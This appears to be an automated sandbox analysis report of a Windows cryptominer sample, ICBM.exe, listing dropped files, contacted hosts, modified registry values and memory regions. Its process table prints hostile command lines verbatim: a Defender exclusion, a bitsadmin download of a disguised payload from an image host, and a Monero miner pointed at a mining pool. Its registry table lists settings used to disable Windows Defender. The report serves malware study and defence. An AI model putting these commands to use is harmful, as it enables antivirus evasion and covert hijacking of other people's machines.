Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
ICBM.exe
|
PE32+ executable (console) x86-64, for MS Windows
|
initial sample
|
 |
|
|
C:\Windows\System32\WinRing0x64.sys
|
PE32+ executable (native) x86-64, for MS Windows
|
dropped
|
|
|
|
C:\Windows\System32\msvchost.exe
|
PE32+ executable (console) x86-64, for MS Windows
|
dropped
|
|
|
|
C:\IT\service_log.txt
|
ASCII text, with very long lines (1157)
|
modified
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage engine DataBase, version 0x620, checksum 0xf563772e, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
|
C:\Windows\BITA85D.tmp
|
PNG image data, 8386 x 2229, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
|
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Windows\Temp\__PSScriptPolicyTest_52g4imp4.qvm.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Windows\Temp\__PSScriptPolicyTest_55ih5ksc.i53.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Windows\Temp\__PSScriptPolicyTest_qh4ad3nr.cg0.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Windows\Temp\__PSScriptPolicyTest_wlwjd3gc.pa1.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Windows\img.png (copy)
|
PNG image data, 8386 x 2229, 8-bit/color RGBA, non-interlaced
|
dropped
|
There are 4 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\ICBM.exe
|
"C:\Users\user\Desktop\ICBM.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
|
|
|
C:\Users\user\Desktop\ICBM.exe
|
C:\Users\user\Desktop\ICBM.exe
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"powershell.exe" -Command "Add-MpPreference -ExclusionPath \"C:\Windows\SystemTemp\delete_clsids.ps1\""
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
|
|
|
C:\Windows\System32\bitsadmin.exe
|
"bitsadmin" /transfer Explorers /download /priority FOREGROUND https://dl.imgdrop.io/file/aed8b140-8472-4813-922b-7ce35ef93c9e/2024/10/31/packedcar47c3772120423724.png
C:\Windows\img.png
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
|
|
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
|
|
|
C:\Windows\System32\msvchost.exe
|
C:\Windows\System32\msvchost.exe -o xmr-eu2.nanopool.org:14433 -u 49QjJy47SU1MGFX7Rep7TQUkGUvvTRqSx4HhzqBgMNwtRvxsXMd98sFZLULDV61ncxVr5kazj9asqctBxy6hWm462wGcBQT
--tls --coin monero
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
|
|
|
C:\Windows\System32\sc.exe
|
"sc" start my_system_service
|
||
|
C:\Windows\System32\wbem\WmiPrvSE.exe
|
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
|
||
|
C:\Windows\System32\cmd.exe
|
C:\Windows\System32\cmd.exe
|
There are 4 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://dl.imgdrop.io/file/aed8b140-8472-4813-922b-7ce35ef93c9e/2
|
unknown
|
|
|
|
https://dl.imgdrop.io/file/aed8b140-8472-4813-922b-7ce35ef93c9e/2024/10/31/packedcar47c3772120423724
|
unknown
|
|
|
|
https://dl.imgdrop.io/file/aed8b140-8472-4813-922b-7ce35ef93c9e/2024/10/31/packedcar47c3772120423724.png
|
104.26.9.242
|
|
|
|
https://dl.imgdrop.io/
|
unknown
|
|
|
|
https://g.live.com/odclientsettings/Prod/C:
|
unknown
|
||
|
https://github.com/clap-rs/clap/issuesC:
|
unknown
|
||
|
https://github.com/clap-rs/clap/issuesjA
|
unknown
|
||
|
http://ns.adobe.assertion
|
unknown
|
||
|
http://ocsp.cloudflare.com/origin_ca0
|
unknown
|
||
|
http://crl.cloudflare.com/origin_ca.crl
|
unknown
|
||
|
https://docs.rs/getrandom#nodejs-es-module-support
|
unknown
|
||
|
https://xmrig.com/docs/algorithms
|
unknown
|
||
|
https://github.com/clap-rs/clap/issues-
|
unknown
|
||
|
http://crl.cloudflare.com/origin_ca.crl0
|
unknown
|
||
|
http://crl.ver)
|
unknown
|
||
|
http://ocsp.cloudflare.com/origin_ca
|
unknown
|
||
|
http://www.quovadis.bm0
|
unknown
|
||
|
https://xmrig.com/benchmark/%s
|
unknown
|
||
|
https://xmrig.com/wizard
|
unknown
|
||
|
https://ocsp.quovadisoffshore.com0
|
unknown
|
||
|
http://crl.cloudflare.com/origin_ca.crlH
|
unknown
|
||
|
https://github.com/clap-rs/clap/issues
|
unknown
|
There are 12 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
dl.imgdrop.io
|
104.26.9.242
|
|
|
|
xmr-eu2.nanopool.org
|
51.195.43.17
|
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
104.26.9.242
|
dl.imgdrop.io
|
United States
|
|
|
|
51.15.89.13
|
unknown
|
France
|
||
|
127.0.0.1
|
unknown
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender
|
DisableAntiSpyware
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender
|
DisableAntiVirus
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine
|
MpEnablePus
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection
|
DisableBehaviorMonitoring
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection
|
DisableIOAVProtection
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection
|
DisableOnAccessProtection
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection
|
DisableRealtimeMonitoring
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection
|
DisableScanOnRealtimeEnable
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting
|
DisableEnhancedNotifications
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet
|
DisableBlockAtFirstSeen
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet
|
SpynetReporting
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet
|
SubmitSamplesConsent
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center
|
FirewallOverride
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center
|
FirewallDisableNotify
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center
|
AntiSpywareOverride
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center
|
AntiVirusOverride
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center
|
AntiVirusDisableNotify
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center
|
UpdatesOverride
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center
|
UpdatesDisableNotify
|
|
|
|
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderApiLogger
|
Start
|
||
|
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderAuditLogger
|
Start
|
||
|
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WdBoot
|
Start
|
||
|
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WdFilter
|
Start
|
||
|
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc
|
Start
|
||
|
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinDefend
|
Start
|
||
|
HKEY_USERS.DEFAULT\Software\Classes\Local Settings\MuiCache\e\52C64B7E
|
@%ProgramFiles%\Windows Defender\MpAsDesc.dll,-300
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
There are 17 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
1CCF878A000
|
heap
|
page read and write
|
|
|
|
7FF6F3AA0000
|
unkown
|
page readonly
|
|
|
|
25943FC3000
|
heap
|
page read and write
|
|
|
|
7FF6F3617000
|
unkown
|
page readonly
|
|
|
|
25943F8C000
|
heap
|
page read and write
|
|
|
|
259459F0000
|
heap
|
page read and write
|
||
|
8611DFF000
|
stack
|
page read and write
|
||
|
20AFE6EE000
|
heap
|
page read and write
|
||
|
25944067000
|
heap
|
page read and write
|
||
|
226046C2000
|
unkown
|
page read and write
|
||
|
22602580000
|
unkown
|
page read and write
|
||
|
20A88640000
|
trusted library allocation
|
page read and write
|
||
|
B67BEFC000
|
stack
|
page read and write
|
||
|
22604658000
|
unkown
|
page read and write
|
||
|
CEA347E000
|
stack
|
page read and write
|
||
|
20A80600000
|
trusted library allocation
|
page read and write
|
||
|
7FF6D2F33000
|
unkown
|
page readonly
|
||
|
20A887B0000
|
trusted library allocation
|
page read and write
|
||
|
20AFE62A000
|
heap
|
page read and write
|
||
|
25948400000
|
direct allocation
|
page read and write
|
||
|
22604360000
|
unkown
|
page read and write
|
||
|
20A80496000
|
heap
|
page read and write
|
||
|
B67BFFE000
|
stack
|
page read and write
|
||
|
2260478C000
|
unkown
|
page read and write
|
||
|
F395687000
|
unkown
|
page read and write
|
||
|
7FF6D2EED000
|
unkown
|
page readonly
|
||
|
1CCEC590000
|
heap
|
page read and write
|
||
|
CEA34FF000
|
stack
|
page read and write
|
||
|
1B2C5710000
|
heap
|
page read and write
|
||
|
20A88A10000
|
trusted library allocation
|
page read and write
|
||
|
20AFE8E0000
|
heap
|
page read and write
|
||
|
20AFE6B0000
|
heap
|
page read and write
|
||
|
25D5E9D0000
|
heap
|
page read and write
|
||
|
20AFE8D0000
|
unclassified section
|
page readonly
|
||
|
1CCEC4C3000
|
heap
|
page read and write
|
||
|
86143FE000
|
stack
|
page read and write
|
||
|
25945AF6000
|
direct allocation
|
page execute and read and write
|
||
|
25945B27000
|
direct allocation
|
page execute and read and write
|
||
|
25945AEC000
|
heap
|
page read and write
|
||
|
BE5627F000
|
stack
|
page read and write
|
||
|
86146FE000
|
stack
|
page read and write
|
||
|
20A88820000
|
remote allocation
|
page read and write
|
||
|
8612FFF000
|
stack
|
page read and write
|
||
|
226025F0000
|
unkown
|
page readonly
|
||
|
1B2C55D9000
|
heap
|
page read and write
|
||
|
7FF6F31F0000
|
unkown
|
page readonly
|
||
|
20AFF000000
|
heap
|
page read and write
|
||
|
1CCEEFC4000
|
heap
|
page read and write
|
||
|
25945ABC000
|
heap
|
page read and write
|
||
|
7FF6D2F8B000
|
unkown
|
page readonly
|
||
|
1CCED1C4000
|
heap
|
page read and write
|
||
|
2594D400000
|
direct allocation
|
page read and write
|
||
|
22604F60000
|
heap
|
page read and write
|
||
|
7FF6F31F1000
|
unkown
|
page execute read
|
||
|
7FF6D2F33000
|
unkown
|
page readonly
|
||
|
20AFE6C0000
|
heap
|
page read and write
|
||
|
7FF6D2F8A000
|
unkown
|
page write copy
|
||
|
CEA2AEB000
|
stack
|
page read and write
|
||
|
20A88679000
|
trusted library allocation
|
page read and write
|
||
|
22602609000
|
heap
|
page read and write
|
||
|
8614FFE000
|
stack
|
page read and write
|
||
|
1CCEC490000
|
heap
|
page read and write
|
||
|
1CCEC4BE000
|
heap
|
page read and write
|
||
|
14CD7FE000
|
stack
|
page read and write
|
||
|
23358A80000
|
heap
|
page read and write
|
||
|
8614BFE000
|
stack
|
page read and write
|
||
|
25D5EBDC000
|
heap
|
page read and write
|
||
|
20A80502000
|
heap
|
page read and write
|
||
|
7FF6D2F8A000
|
unkown
|
page read and write
|
||
|
8611FFD000
|
stack
|
page read and write
|
||
|
86144FE000
|
stack
|
page read and write
|
||
|
25945ADC000
|
heap
|
page read and write
|
||
|
2260477D000
|
unkown
|
page read and write
|
||
|
CEA337B000
|
stack
|
page read and write
|
||
|
20A80020000
|
trusted library section
|
page readonly
|
||
|
BE562FE000
|
stack
|
page read and write
|
||
|
25D5EBF7000
|
heap
|
page read and write
|
||
|
25945972000
|
direct allocation
|
page execute and read and write
|
||
|
25945962000
|
direct allocation
|
page execute and read and write
|
||
|
25947000000
|
direct allocation
|
page read and write
|
||
|
23358C10000
|
heap
|
page read and write
|
||
|
25945C00000
|
direct allocation
|
page read and write
|
||
|
20AFF100000
|
heap
|
page read and write
|
||
|
2260444E000
|
unkown
|
page read and write
|
||
|
1CCEC600000
|
heap
|
page read and write
|
||
|
22604724000
|
unkown
|
page read and write
|
||
|
20A80030000
|
trusted library section
|
page readonly
|
||
|
1CCF2D2F000
|
heap
|
page read and write
|
||
|
25D5EC04000
|
heap
|
page read and write
|
||
|
20A88670000
|
trusted library allocation
|
page read and write
|
||
|
8611AFF000
|
stack
|
page read and write
|
||
|
86142FF000
|
stack
|
page read and write
|
||
|
20AFFF20000
|
trusted library allocation
|
page read and write
|
||
|
CEA2F79000
|
stack
|
page read and write
|
||
|
14CD6FF000
|
stack
|
page read and write
|
||
|
BE5637F000
|
stack
|
page read and write
|
||
|
20A80553000
|
heap
|
page read and write
|
||
|
7FF6F3A6F000
|
unkown
|
page readonly
|
||
|
22602840000
|
heap
|
page read and write
|
||
|
259459E5000
|
heap
|
page read and write
|
||
|
7FF6D2F8B000
|
unkown
|
page readonly
|
||
|
20AFE6D5000
|
heap
|
page read and write
|
||
|
25945AAC000
|
heap
|
page read and write
|
||
|
86140FE000
|
stack
|
page read and write
|
||
|
20AFE6CC000
|
heap
|
page read and write
|
||
|
25945840000
|
heap
|
page read and write
|
||
|
2594590F000
|
direct allocation
|
page execute and read and write
|
||
|
25945A70000
|
heap
|
page read and write
|
||
|
1CCEC4BE000
|
heap
|
page read and write
|
||
|
20A803A1000
|
trusted library allocation
|
page read and write
|
||
|
1CCEC4B6000
|
heap
|
page read and write
|
||
|
20A80461000
|
heap
|
page read and write
|
||
|
1CCEC52C000
|
heap
|
page read and write
|
||
|
7FF6D2D31000
|
unkown
|
page execute read
|
||
|
25948E00000
|
direct allocation
|
page read and write
|
||
|
1B2C5790000
|
heap
|
page read and write
|
||
|
1CCF192F000
|
heap
|
page read and write
|
||
|
20A887A0000
|
trusted library allocation
|
page read and write
|
||
|
25D5ECB0000
|
heap
|
page read and write
|
||
|
CEA38FE000
|
stack
|
page read and write
|
||
|
20A88820000
|
remote allocation
|
page read and write
|
||
|
7FF6D2EED000
|
unkown
|
page readonly
|
||
|
20AFE6FB000
|
heap
|
page read and write
|
||
|
7FF6D2D30000
|
unkown
|
page readonly
|
||
|
20A886A0000
|
trusted library allocation
|
page read and write
|
||
|
20A8866D000
|
trusted library allocation
|
page read and write
|
||
|
8611CFE000
|
stack
|
page read and write
|
||
|
B67C0FE000
|
stack
|
page read and write
|
||
|
20AFE702000
|
heap
|
page read and write
|
||
|
8611BFE000
|
stack
|
page read and write
|
||
|
86147FE000
|
stack
|
page read and write
|
||
|
1CCEC675000
|
heap
|
page read and write
|
||
|
7FF6D2EED000
|
unkown
|
page readonly
|
||
|
7FF6D2D30000
|
unkown
|
page readonly
|
||
|
20AFE600000
|
heap
|
page read and write
|
||
|
7FF6D2F33000
|
unkown
|
page readonly
|
||
|
25945A7A000
|
heap
|
page read and write
|
||
|
20A8866A000
|
trusted library allocation
|
page read and write
|
||
|
F39597E000
|
unkown
|
page read and write
|
||
|
14CD9FC000
|
stack
|
page read and write
|
||
|
22602600000
|
heap
|
page read and write
|
||
|
F3959FC000
|
unkown
|
page read and write
|
||
|
25945A30000
|
heap
|
page read and write
|
||
|
1CCEC7C4000
|
heap
|
page read and write
|
||
|
1CCEC340000
|
heap
|
page read and write
|
||
|
20AFE6E0000
|
heap
|
page read and write
|
||
|
25949800000
|
direct allocation
|
page read and write
|
||
|
22604C30000
|
unkown
|
page read and write
|
||
|
25945908000
|
direct allocation
|
page execute and read and write
|
||
|
20AFE6C5000
|
heap
|
page read and write
|
||
|
F39568D000
|
unkown
|
page read and write
|
||
|
86148FF000
|
stack
|
page read and write
|
||
|
86149FE000
|
stack
|
page read and write
|
||
|
20A8867F000
|
trusted library allocation
|
page read and write
|
||
|
1CCEC51D000
|
heap
|
page read and write
|
||
|
1B2C5715000
|
heap
|
page read and write
|
||
|
20AFE560000
|
unclassified section
|
page readonly
|
||
|
20A88650000
|
trusted library allocation
|
page read and write
|
||
|
1CCEC4DC000
|
heap
|
page read and write
|
||
|
1CCEC4C1000
|
heap
|
page read and write
|
||
|
14CD33D000
|
stack
|
page read and write
|
||
|
1CCEC498000
|
heap
|
page read and write
|
||
|
7FF6D2F33000
|
unkown
|
page readonly
|
||
|
20AFF102000
|
heap
|
page read and write
|
||
|
25D5EBFF000
|
heap
|
page read and write
|
||
|
20A80551000
|
heap
|
page read and write
|
||
|
20AFE6A1000
|
heap
|
page read and write
|
||
|
25946600000
|
direct allocation
|
page read and write
|
||
|
20A88820000
|
remote allocation
|
page read and write
|
||
|
7FF6F37BF000
|
unkown
|
page write copy
|
||
|
7FF6F3A9A000
|
unkown
|
page execute read
|
||
|
20A886A0000
|
trusted library allocation
|
page read and write
|
||
|
7FF6D2F8A000
|
unkown
|
page write copy
|
||
|
259459E0000
|
heap
|
page read and write
|
||
|
25945941000
|
direct allocation
|
page execute and read and write
|
||
|
1CCEC4C3000
|
heap
|
page read and write
|
||
|
25945930000
|
direct allocation
|
page execute and read and write
|
||
|
7FF6D2D31000
|
unkown
|
page execute read
|
||
|
259459D5000
|
direct allocation
|
page execute and read and write
|
||
|
20A8048C000
|
heap
|
page read and write
|
||
|
20AFF19B000
|
heap
|
page read and write
|
||
|
20A803E0000
|
trusted library allocation
|
page read and write
|
||
|
20AFFC60000
|
trusted library allocation
|
page read and write
|
||
|
20A80010000
|
trusted library section
|
page readonly
|
||
|
1CCF0F2F000
|
heap
|
page read and write
|
||
|
259459B4000
|
direct allocation
|
page execute and read and write
|
||
|
25943F80000
|
heap
|
page read and write
|
||
|
22604746000
|
unkown
|
page read and write
|
||
|
20AFE671000
|
heap
|
page read and write
|
||
|
25947A00000
|
direct allocation
|
page read and write
|
||
|
20AFE550000
|
heap
|
page read and write
|
||
|
25945B17000
|
direct allocation
|
page execute and read and write
|
||
|
86145FE000
|
stack
|
page read and write
|
||
|
CEA3DFE000
|
stack
|
page read and write
|
||
|
25945B06000
|
direct allocation
|
page execute and read and write
|
||
|
F3958FE000
|
unkown
|
page read and write
|
||
|
22602C01000
|
unkown
|
page readonly
|
||
|
20AFE6A7000
|
heap
|
page read and write
|
||
|
22604704000
|
unkown
|
page read and write
|
||
|
CEA35F9000
|
stack
|
page read and write
|
||
|
25945AA4000
|
heap
|
page read and write
|
||
|
CEA307E000
|
stack
|
page read and write
|
||
|
20A887D0000
|
trusted library allocation
|
page read and write
|
||
|
25945900000
|
direct allocation
|
page execute and read and write
|
||
|
22604586000
|
unkown
|
page read and write
|
||
|
1B2C55D0000
|
heap
|
page read and write
|
||
|
20AFE5C0000
|
heap
|
page read and write
|
||
|
259459ED000
|
heap
|
page read and write
|
||
|
7FF6D2D31000
|
unkown
|
page execute read
|
||
|
20A89000000
|
heap
|
page read and write
|
||
|
20AFF002000
|
heap
|
page read and write
|
||
|
20AFE67F000
|
heap
|
page read and write
|
||
|
25D5EBF2000
|
heap
|
page read and write
|
||
|
2594A200000
|
direct allocation
|
page read and write
|
||
|
20A88660000
|
trusted library allocation
|
page read and write
|
||
|
20A88676000
|
trusted library allocation
|
page read and write
|
||
|
25945AD4000
|
heap
|
page read and write
|
||
|
8614AFF000
|
stack
|
page read and write
|
||
|
226045D0000
|
unkown
|
page read and write
|
||
|
25943FE7000
|
heap
|
page read and write
|
||
|
BE5647E000
|
stack
|
page read and write
|
||
|
20A88790000
|
trusted library allocation
|
page read and write
|
||
|
25D5EDD0000
|
heap
|
page read and write
|
||
|
25D5EDD5000
|
heap
|
page read and write
|
||
|
22602845000
|
heap
|
page read and write
|
||
|
20A80400000
|
heap
|
page read and write
|
||
|
20A8867C000
|
trusted library allocation
|
page read and write
|
||
|
20A803D0000
|
trusted library allocation
|
page read and write
|
||
|
1CCEC4B3000
|
heap
|
page read and write
|
||
|
1B2C5480000
|
heap
|
page read and write
|
||
|
20A80514000
|
heap
|
page read and write
|
||
|
1CCEDBC4000
|
heap
|
page read and write
|
||
|
20A8047C000
|
heap
|
page read and write
|
||
|
1CCEC4C1000
|
heap
|
page read and write
|
||
|
20A88660000
|
trusted library allocation
|
page read and write
|
||
|
25945983000
|
direct allocation
|
page execute and read and write
|
||
|
20A80447000
|
heap
|
page read and write
|
||
|
25D5EC02000
|
heap
|
page read and write
|
||
|
259459C5000
|
direct allocation
|
page execute and read and write
|
||
|
2594405E000
|
heap
|
page read and write
|
||
|
226027D0000
|
unkown
|
page read and write
|
||
|
20A80050000
|
trusted library section
|
page readonly
|
||
|
20AFE713000
|
heap
|
page read and write
|
||
|
2594B600000
|
direct allocation
|
page read and write
|
||
|
2594406B000
|
heap
|
page read and write
|
||
|
20A88664000
|
trusted library allocation
|
page read and write
|
||
|
CEA387E000
|
stack
|
page read and write
|
||
|
23358A8C000
|
heap
|
page read and write
|
||
|
7FF6D2F8B000
|
unkown
|
page readonly
|
||
|
20A887B0000
|
trusted library allocation
|
page read and write
|
||
|
20A88690000
|
trusted library allocation
|
page read and write
|
||
|
20A88730000
|
trusted library allocation
|
page read and write
|
||
|
25945AB4000
|
heap
|
page read and write
|
||
|
2260463A000
|
unkown
|
page read and write
|
||
|
7FF6D2D30000
|
unkown
|
page readonly
|
||
|
BE55F49000
|
stack
|
page read and write
|
||
|
8614EFE000
|
stack
|
page read and write
|
||
|
259459A4000
|
direct allocation
|
page execute and read and write
|
||
|
CEA36FF000
|
stack
|
page read and write
|
||
|
20AFE613000
|
heap
|
page read and write
|
||
|
2594CA00000
|
direct allocation
|
page read and write
|
||
|
86137FE000
|
stack
|
page read and write
|
||
|
2594C000000
|
direct allocation
|
page read and write
|
||
|
23358B80000
|
heap
|
page read and write
|
||
|
20A80557000
|
heap
|
page read and write
|
||
|
BE55FCE000
|
stack
|
page read and write
|
||
|
20A88683000
|
trusted library allocation
|
page read and write
|
||
|
25945AC4000
|
heap
|
page read and write
|
||
|
14CDAFE000
|
stack
|
page read and write
|
||
|
25945920000
|
direct allocation
|
page execute and read and write
|
||
|
25945AE4000
|
heap
|
page read and write
|
||
|
25D5EBBC000
|
heap
|
page read and write
|
||
|
A4C5EFF000
|
stack
|
page read and write
|
||
|
B67C1FF000
|
stack
|
page read and write
|
||
|
CEA367E000
|
stack
|
page read and write
|
||
|
20A88690000
|
trusted library allocation
|
page read and write
|
||
|
1CCEE5C4000
|
heap
|
page read and write
|
||
|
20A89010000
|
heap
|
page read and write
|
||
|
2594405B000
|
heap
|
page read and write
|
||
|
20A8054A000
|
heap
|
page read and write
|
||
|
20A88680000
|
trusted library allocation
|
page read and write
|
||
|
7FF6D2F8B000
|
unkown
|
page readonly
|
||
|
20AFE65B000
|
heap
|
page read and write
|
||
|
20A887C0000
|
trusted library allocation
|
page read and write
|
||
|
7FF6D2D31000
|
unkown
|
page execute read
|
||
|
25945993000
|
direct allocation
|
page execute and read and write
|
||
|
25945A80000
|
heap
|
page read and write
|
||
|
86141FF000
|
stack
|
page read and write
|
||
|
22602850000
|
unkown
|
page readonly
|
||
|
2260474B000
|
unkown
|
page read and write
|
||
|
20AFE6B8000
|
heap
|
page read and write
|
||
|
86118FF000
|
stack
|
page read and write
|
||
|
20A80480000
|
heap
|
page read and write
|
||
|
20AFE641000
|
heap
|
page read and write
|
||
|
CEA33FF000
|
stack
|
page read and write
|
||
|
8613FFE000
|
stack
|
page read and write
|
||
|
20A88673000
|
trusted library allocation
|
page read and write
|
||
|
20A80499000
|
heap
|
page read and write
|
||
|
22604460000
|
unkown
|
page read and write
|
||
|
22602540000
|
heap
|
page read and write
|
||
|
8614DFE000
|
stack
|
page read and write
|
||
|
8611EFE000
|
stack
|
page read and write
|
||
|
20AFF200000
|
trusted library section
|
page read and write
|
||
|
25945951000
|
direct allocation
|
page execute and read and write
|
||
|
20A88686000
|
trusted library allocation
|
page read and write
|
||
|
20AFE684000
|
heap
|
page read and write
|
||
|
25945ACC000
|
heap
|
page read and write
|
||
|
CEA39FB000
|
stack
|
page read and write
|
||
|
20AFF119000
|
heap
|
page read and write
|
||
|
20A80567000
|
heap
|
page read and write
|
||
|
25943FD6000
|
heap
|
page read and write
|
||
|
CEA3AFA000
|
stack
|
page read and write
|
||
|
20A804D7000
|
heap
|
page read and write
|
||
|
86140FB000
|
stack
|
page read and write
|
||
|
A4C5E7E000
|
stack
|
page read and write
|
||
|
25D5EC09000
|
heap
|
page read and write
|
||
|
20A88730000
|
trusted library allocation
|
page read and write
|
||
|
7FF6D2EED000
|
unkown
|
page readonly
|
||
|
25D5EB30000
|
heap
|
page read and write
|
||
|
1CCF372F000
|
heap
|
page read and write
|
||
|
20AFE6AE000
|
heap
|
page read and write
|
||
|
22604660000
|
unkown
|
page read and write
|
||
|
CEA317C000
|
stack
|
page read and write
|
||
|
CEA327C000
|
stack
|
page read and write
|
||
|
23358950000
|
heap
|
page read and write
|
||
|
20AFE6F2000
|
heap
|
page read and write
|
||
|
20AFE6A4000
|
heap
|
page read and write
|
||
|
1CCF232F000
|
heap
|
page read and write
|
||
|
1CCEC670000
|
heap
|
page read and write
|
||
|
2594AC00000
|
direct allocation
|
page read and write
|
||
|
861158A000
|
stack
|
page read and write
|
||
|
25943F00000
|
heap
|
page read and write
|
||
|
A4C5B9D000
|
stack
|
page read and write
|
||
|
25D5EBB0000
|
heap
|
page read and write
|
||
|
20AFEED0000
|
trusted library allocation
|
page read and write
|
||
|
20A80000000
|
trusted library section
|
page readonly
|
||
|
20AFE6B3000
|
heap
|
page read and write
|
||
|
20A80454000
|
heap
|
page read and write
|
||
|
86127FB000
|
stack
|
page read and write
|
||
|
20AFF113000
|
heap
|
page read and write
|
||
|
1B2C5720000
|
heap
|
page read and write
|
||
|
20A88689000
|
trusted library allocation
|
page read and write
|
||
|
20A88661000
|
trusted library allocation
|
page read and write
|
||
|
20A88740000
|
trusted library allocation
|
page read and write
|
||
|
8614CFE000
|
stack
|
page read and write
|
||
|
226044C2000
|
unkown
|
page read and write
|
||
|
20AFE5F0000
|
unclassified section
|
page readonly
|
||
|
20AFE69B000
|
heap
|
page read and write
|
||
|
25945A9C000
|
heap
|
page read and write
|
||
|
BE563FD000
|
stack
|
page read and write
|
||
|
7FF6D2F8A000
|
unkown
|
page read and write
|
||
|
20A886A4000
|
trusted library allocation
|
page read and write
|
||
|
1CCEC4D4000
|
heap
|
page read and write
|
||
|
25943DC0000
|
heap
|
page read and write
|
||
|
20A80464000
|
heap
|
page read and write
|
||
|
7FF6D2D30000
|
unkown
|
page readonly
|
||
|
259458B0000
|
direct allocation
|
page execute read
|
||
|
20A80040000
|
trusted library section
|
page readonly
|
||
|
8611FFB000
|
stack
|
page read and write
|
||
|
20AFF015000
|
heap
|
page read and write
|
||
|
CEA37FE000
|
stack
|
page read and write
|
||
|
F39568F000
|
unkown
|
page read and write
|
||
|
22602A61000
|
unkown
|
page readonly
|
||
|
23358D80000
|
heap
|
page read and write
|
||
|
20AFF119000
|
heap
|
page read and write
|
||
|
22604524000
|
unkown
|
page read and write
|
||
|
20AFE673000
|
heap
|
page read and write
|
There are 357 hidden memdumps, click here to show them.